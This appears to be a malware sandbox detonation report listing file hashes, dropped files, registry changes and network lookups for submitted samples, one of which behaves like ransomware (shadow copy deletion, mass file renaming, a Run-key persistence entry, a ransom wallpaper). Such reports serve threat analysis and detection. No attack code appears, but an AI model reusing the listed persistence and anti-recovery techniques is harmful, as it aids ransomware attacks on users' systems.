| SHA1 | e5ba1f81a5567f5169dcb9d62e14284e2956dd02 |
| SHA256 | 84f579f40f1a5b443236145d7dffba62a94645f36b2096a31726a5b4f7338e96 |
| SHA512 | 790ab9c9ab696cd732b8570395f698b04c2eeb5dbda729a2e200e9a1fac17c6fec805f3b6a678bd92c4b65f87b757567564a535db2dd38984f5cfac275de55a9 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata
| MD5 | 0219a8ed6f2aea2f640b8e68490f21b4 |
| SHA1 | 9fc849ae38e2c9b7f89f6364a01e5ef9cc471299 |
| SHA256 | 1b9fc8ce610ca19581b5538f2266c30d8b01b1d0c5a7ca02ab82c3b4921b9365 |
| SHA512 | d81f01601b3ac3c6fa766f7eee2d195988bc868eaf88ee26f1220c8654b239e644d3991d5f3e8605d2024f65d8e3406daa0f3183cb876a4734c869fc2c9e5996 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\484d5056-bf18-40b6-bdf6-da04e6142756.dmp
| MD5 | d5b9a3d9e19a4d3b69394e3e343fe8c3 |
| SHA1 | 1a35e931efc6c5a51ac33f31702348768eda489f |
| SHA256 | dd14d7d2ade72e291fb3229b21a96b2eafadc091b5d61e647d7a1dd8dfecdc51 |
| SHA512 | 746ac38ac3e8f2ac936d97fead0167b4e79c01f5955e4b855c2bd2912ba0b4c6a02c089c84b38b77a933213a38a128b4df6eea066e751c5948cfb598c8e53f2a |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 4ad7327aba9ef27157e727ab4fa2d26c |
| SHA1 | 01aadd85db08b3f48f5e32a76f531d5c2f865506 |
| SHA256 | b06ecef6acd7d05a1fc5b4aacc6b8f3ca54e822c74fb3f5deb81bbd399230890 |
| SHA512 | 9c2cf62359f96cedb6ac1683f6e8c10356ec9b6fbfc46d38b60ea1ace82d7493e301b779d63524cd8245134d2b1fff2a6d4c0e674401bcd9ad4cf5bf4ebe6afd |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\watson_metadata
| MD5 | ecba53dffe3425383c7c3478e9426e51 |
| SHA1 | 9a2782062f1a405050a07a89efcfbd5a2e2e1908 |
| SHA256 | ad690033c62605107c5ef5e7d7a20e73684c6d537bd70b0b9dbb0e32b20db103 |
| SHA512 | 55464564a3c240a7ab303df8fc8f999264ec5460ec9f17f90ab949cc3cb181130eaa1af5099960c836ce4edf081560f174f72aebe5f2081677155e4fe55af476 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\f9d41a58-fff9-494f-8b09-6f5f70b05f61.dmp
| MD5 | 71f9654fea0e8f1bd23586a918e94f89 |
| SHA1 | f5b6f274b17ab97477e96e0a4241e3bcec1cb573 |
| SHA256 | 873756031dcd3f7b5e04e23a5ecd9f692e30972a1f6ce25511d4e62c47620530 |
| SHA512 | 77d3f8cd1a9c67f57aa5adff8aa1223b0108905a3c669a4580093b69fb3222dce32908bca16b8e528c7aaa59045e71d84ab32eccc0710dd159a78d9484d029d4 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | e8511948589f48b440602db6d8fadacb |
| SHA1 | ac63a2da4d1aa3a5170905596946f322a03a043a |
| SHA256 | e33ea0ac9728e9ce874a6fbe6ae7dad4d5a7bfdda3e5d3723f21220f6e3caa15 |
| SHA512 | 909c66561d6ed154b5bba9639efc14411495544b53aea202069fff91adae86f412a887d963f891de23b296025e0f9f58e0f4e2cfe657640c7c0c9717004251c8 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata
| MD5 | f138d10a912b31a51837761117c11fd4 |
| SHA1 | 1c271ffcc3f487df63f8f8820a4b2a66c07ab8f3 |
| SHA256 | 104b3a91ced55bb2055822aafab043432c281c93f1ba10ef5e8545e833422570 |
| SHA512 | 022b49b5345af4db35721fbc2d89e85e8e3bf2712caa7bedb965c6f0d1ec10a887d95eb6e72e3286cee7f49c05e7b5d797519f9db5e107a51a34133c93620794 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\7e3914da-e0ef-4320-9bb4-8e68e9602b49.dmp
| MD5 | 3c54b95dfaa9af00bca21f33200b5f1b |
| SHA1 | 07f57bf6fad746d7f8f45c828e8d509cdc16663b |
| SHA256 | a1c9665ad1e512988f260f9fc20fbbf6f5a71e039d79f6e5399c26e044ab4381 |
| SHA512 | 2f624f589e5bd90f543bda927df436acc8dcee02f51ad1ef450308524866e234b09a5467a08f56d9dadbc05ab36371a49da8524cf0ff1e402e2f99356df489bf |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | a0195f883f19c1bd522fb82e1149fc49 |
| SHA1 | 675c9eef7fb809447ccfa39ddfe63faee5e39fa9 |
| SHA256 | 6f064e90c549d71aacb5af1d949ef5f11d8b21bce5fa3d698910a0a1d5998079 |
| SHA512 | b5fd75ab870f1d5e26eb1e7822b8be382e0411fbbcdf7af7ed4357b3404d3943ef1992f33eae12e8d665b7a8ce69afc89f0bdaf0de4ba1a389415b6c67f898a7 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata
| MD5 | f89d15c4f7fc9c6655d39bc766873d36 |
| SHA1 | 1ddb60f6fb3b5b0772f341ca13a13b369f2492f4 |
| SHA256 | 5bebd90447baf407de5be817059a4cb67725739110b1d91aa958b23d648fc1e0 |
| SHA512 | 8242067a94b631d4b4f42e31fb710b4b649770cf8bfcb9724609b07f83f48b9e2789350a3edcd5a1d35503cdb48818361ae01db1e106a898c63255f27f55ace6 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\watson_metadata
| MD5 | d0a5de8ae0db394a37f55fdaa4185008 |
| SHA1 | 5c4a13f255c76ba4c41502dbba609f6bcac920da |
| SHA256 | e3de23df00db9364a53c3b1fde2cd40de7020a809b923d3e726d4dad105fbe0a |
| SHA512 | 582489f97cb2729b17ceb3cfae356dbf3081a1237a2b08f8d4a131300ec61d80c767da14d53358242a5efd6a34bc1dc0753bdcb1f22852a2b4980b5daac534d2 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\5e60c884-6d94-44ea-b170-ce57f64e0f5e.dmp
| MD5 | 9beb773a40b8bc535e88bcdd77b374a1 |
| SHA1 | def70cb36875e8344d06332fd86d4f48927a4a65 |
| SHA256 | 8c2046a2c2f3982ef87b30295ac55e63c94371e788edd7db5065b7d60b65b9ac |
| SHA512 | 4153f1bd4157cdb6138a79c35fa4214ab0131b1e8061dc3bf33922ef43f767607f28338dcbc7679d4029dce9fde61c687dea5b1dc6760b9bca6c762646642201 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 6c2d2b13aecc0640ff6699a10e2cec61 |
| SHA1 | 5407afdce74f6abce3c4cd4a27c7faebe601f6ba |
| SHA256 | cdb48d4205f2cf822d571bd98cbb1fb5dd2039d3ef096291084ee3149f476af2 |
| SHA512 | 532f94c85c64bb43ae610741d81115f7032269ce89dfca5494712e32f20104c91b608ff68c016f8f08020da8b12f147e8c93923325e51ba0ba8ac224155a1d47 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata
| MD5 | ec1f4771a0eec2b2b834397f7358ce73 |
| SHA1 | 2f83497265c56715aa95e968ba7435c6dc2ed5b5 |
| SHA256 | 2ee652b89a202ecc112b47fc37b6fec63c02d572c520dc9ee1f1ebc5a6ffd5de |
| SHA512 | e39e68d6fcb69c13b38977a335c70f406550f1b8d931cce9cf9d86096305270499bf2d0908c853ef845e496bbe364ff88b3718a4ca18eab0f99a9c361765e728 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\e1b193b8-c9fd-4277-9203-d9a34c05bfb3.dmp
| MD5 | 4f61f19f8a883dafeae453aada613081 |
| SHA1 | 0b3754e1b4878718931ef79d1cd6ce139d04e832 |
| SHA256 | c1381baed7604478e3e86f9311177ea85fdcb7eba7bba421be53c2fc19560796 |
| SHA512 | dd0829f7d53e7ddacd896c836fd4197ff954204b73290968345c13876acc821a74ee09a114083b2094d822dd8f34dbabca54a86c61fc9b1884000863d22599e5 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 9daf8f31562dc4723ede842708baf493 |
| SHA1 | fca28c2c2795dc75bdd5e96edd986ea7019142dd |
| SHA256 | 03b3a427481866f403ce992275d3e46ad0da6c52bf40ed214f8bc27456722535 |
| SHA512 | 818fcf8229fb4a8aec4b7f00e8c009e2bf9df7cd3b0b5ddb21b4343e3ccb2a90e7fbecf1c991b950e495e842472846c67797507d29d5cdffce771648a004765b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\6a063607-17f7-4d99-917e-1336841dce5d.dmp
| MD5 | f4d49ae8b82edd11bcd7248c8d6c6f27 |
| SHA1 | 47be6c6ffae9b98ad9e9c5eba47b89245c33958d |
| SHA256 | 74aed285e2aa039c66659443ea337b7b36d67e429c11a6594a2ed2fa31ad77b0 |
| SHA512 | 4cb31f771c372ee2984c12de1951035380efa4cf271ea6eff502206e42e8702e5db12ec016c3989a8e5419d96adc531cb40996605641c2d5eb1c8d71eb66ee40 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | c53099cfb6d41b43830ac5300d32c2a5 |
| SHA1 | e748e98368da7bc04b850c64d4afff29d2b68ffc |
| SHA256 | ac3cd6465b051ed18d4aa297b95001405fffeb4b88d8a166da8a9e9e11634f0f |
| SHA512 | 423cedf9c728daf71dd5381a090a96b8d443128d406acf89c3ba49d7ac8d4a8feab3221a1ad33ddb881021c70f30f0382813bbc3e9f981c9cf8b83a5051b0dc4 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\2fdd3fe7-c2d8-434d-b3f9-872405af98bc.dmp
| MD5 | 03792c5ef3af01ba0ae49db6bdfe30fd |
| SHA1 | 653784eae32a67ed15e5ff8e739b6d710945be1f |
| SHA256 | c788ba7eec0136857526119a685d7cfd73a23f208048d0223d426790c4c1fa8e |
| SHA512 | 2f918915faacf9edecfeddc40d5eb01bfac58c57ba03b08748076ce769277806602c0f6e789cec7e6c7d56eeb19de2077f2997c22614907b6e2c17df7f80533e |
Analysis: behavioral5
Detonation Overview
Submitted
2024-11-14 05:42
Reported
2024-11-14 05:44
Platform
win10ltsc2021-20241023-en
Max time kernel
101s
Max time network
102s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\51B4EF5DC9D26B7A26E214CEE90598631E2EAA67.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4928 wrote to memory of 4728 | N/A | C:\Users\Admin\AppData\Local\Temp\51B4EF5DC9D26B7A26E214CEE90598631E2EAA67.exe | C:\Users\Admin\AppData\Local\Temp\51B4EF5DC9D26B7A26E214CEE90598631E2EAA67.exe |
| PID 4928 wrote to memory of 4728 | N/A | C:\Users\Admin\AppData\Local\Temp\51B4EF5DC9D26B7A26E214CEE90598631E2EAA67.exe | C:\Users\Admin\AppData\Local\Temp\51B4EF5DC9D26B7A26E214CEE90598631E2EAA67.exe |
| PID 4928 wrote to memory of 4728 | N/A | C:\Users\Admin\AppData\Local\Temp\51B4EF5DC9D26B7A26E214CEE90598631E2EAA67.exe | C:\Users\Admin\AppData\Local\Temp\51B4EF5DC9D26B7A26E214CEE90598631E2EAA67.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\51B4EF5DC9D26B7A26E214CEE90598631E2EAA67.exe
"C:\Users\Admin\AppData\Local\Temp\51B4EF5DC9D26B7A26E214CEE90598631E2EAA67.exe"
C:\Users\Admin\AppData\Local\Temp\51B4EF5DC9D26B7A26E214CEE90598631E2EAA67.exe
C:\Users\Admin\AppData\Local\Temp\51B4EF5DC9D26B7A26E214CEE90598631E2EAA67.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.210.109.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
Files
memory/4928-0-0x0000000000400000-0x0000000000447000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-14 05:42
Reported
2024-11-14 05:44
Platform
win7-20241010-en
Max time kernel
79s
Max time network
80s
Command Line
Signatures
Deletes shadow copies
Renames multiple (735) files with added filename extension
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SysWOW64\drivers\gmreadme.txt | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
Reads user/profile data of web browsers
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows\CurrentVersion\Run\crypto13 = "C:\\Users\\Admin\\AppData\\Roaming\\kifyvva.exe" | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
Indicator Removal: File Deletion
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\de-DE\about_Reserved_Words.help.txt | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\es-ES\about_Break.help.txt | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\it-IT\about_Parsing.help.txt | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\ja-JP\about_environment_variables.help.txt | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\ja-JP\about_While.help.txt | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\FileRepository\prnhp004.inf_amd64_neutral_53f688945cfc24cc\Amd64\hpzpaw72.vdf | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\de-DE\about_CommonParameters.help.txt | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\ja-JP\Licenses\eval\StarterE\license.rtf | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\license.rtf | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\ja-JP\Licenses\eval\EnterpriseN\license.rtf | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\de-DE\about_regular_expressions.help.txt | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\de-DE\about_try_catch_finally.help.txt | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\es-ES\about_If.help.txt | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\it-IT\about_WMI_Cmdlets.help.txt | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\en-US\Licenses\_Default\HomeBasicN\license.rtf | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\it-IT\Licenses\_Default\Enterprise\license.rtf | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\es-ES\Licenses\OEM\StarterE\license.rtf | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\es-ES\Licenses\_Default\Starter\license.rtf | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\es-ES\about_Language_Keywords.help.txt | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\it-IT\default.help.txt | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\es-ES\Licenses\_Default\EnterpriseE\license.rtf | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\wdi\perftrack\HealthCenterInstrumentation.ptxml | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\fr-FR\about_operators.help.txt | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\it-IT\about_locations.help.txt | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\ja-JP\about_CommonParameters.help.txt | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\FileRepository\prnhp005.inf_amd64_neutral_914d6c300207814f\Amd64\hp6000at.vdf | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_PSSnapins.help.txt | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\es-ES\about_scopes.help.txt | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_Command_Syntax.help.txt | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\en-US\Licenses\eval\StarterN\license.rtf | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\fr-FR\Licenses\_Default\HomePremiumN\license.rtf | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\it-IT\Licenses\OEM\ProfessionalE\license.rtf | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\es-ES\about_logical_operators.help.txt | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\es-ES\about_Quoting_Rules.help.txt | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\ja-JP\Licenses\_Default\UltimateN\license.rtf | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\wdi\perftrack\AltTab.ptxml | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\it-IT\Licenses\eval\HomeBasic\license.rtf | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\it-IT\Licenses\eval\Professional\license.rtf | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\ja-JP\Licenses\eval\HomePremium\license.rtf | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\fr-FR\about_debuggers.help.txt | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\es-ES\Licenses\eval\ProfessionalN\license.rtf | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\fr-FR\Licenses\OEM\HomePremiumE\license.rtf | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\fr-FR\Licenses\eval\ProfessionalN\license.rtf | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\ja-JP\about_format.ps1xml.help.txt | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\ja-JP\Licenses\eval\UltimateN\license.rtf | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_remote_FAQ.help.txt | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_wildcards.help.txt | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\en-US\lpeula.rtf | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\es-ES\Licenses\OEM\ProfessionalE\license.rtf | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\de-DE\about_Core_Commands.help.txt | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\de-DE\about_functions_advanced_parameters.help.txt | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\de-DE\ImportAllModules.psd1 | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\fr-FR\about_Windows_PowerShell_2.0.help.txt | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\it-IT\about_hash_tables.help.txt | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\de-DE\Licenses\eval\StarterE\license.rtf | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\fr-FR\Licenses\eval\EnterpriseN\license.rtf | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WCN\ja-JP\Add_a_device_or_computer_to_a_network_usb.rtf | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\es-ES\about_Assignment_Operators.help.txt | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\ja-JP\about_pssession_details.help.txt | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\FileRepository\prnhp004.inf_amd64_neutral_53f688945cfc24cc\Amd64\hpb8500t.vdf | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\es-ES\Licenses\eval\UltimateE\license.rtf | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\fr-FR\about_scopes.help.txt | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\it-IT\about_Switch.help.txt | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\de-DE\about_Assignment_Operators.help.txt | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\HELP_TO_DECRYPT_YOUR_FILES.bmp" | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\LayeredTitles\NavigationUp_SelectionSubpicture.png | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\106.0.5249.119\Locales\ja.pak | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\drag.png | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-waning-crescent_partly-cloudy.png | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\NotifierBackground.jpg | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsHomePageStyle.css | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\BriefcaseIcon.jpg | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\ja-JP\js\library.js | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\de-DE\js\highDpiImageSwap.js | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\vi.txt | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_frame-highlight.png | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\de-DE\js\clock.js | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\fr-FR\css\settings.css | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\it-IT\css\localizedSettings.css | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\ja-JP\css\localizedSettings.css | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Adobe.css | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DissolveAnother.png | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\Stacking\720_480shadow.png | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\es-ES\css\localizedSettings.css | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\Title_content-background.png | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\6.png | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\Adobe AIR\Versions\1.0\Adobe Root Certificate.cer | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
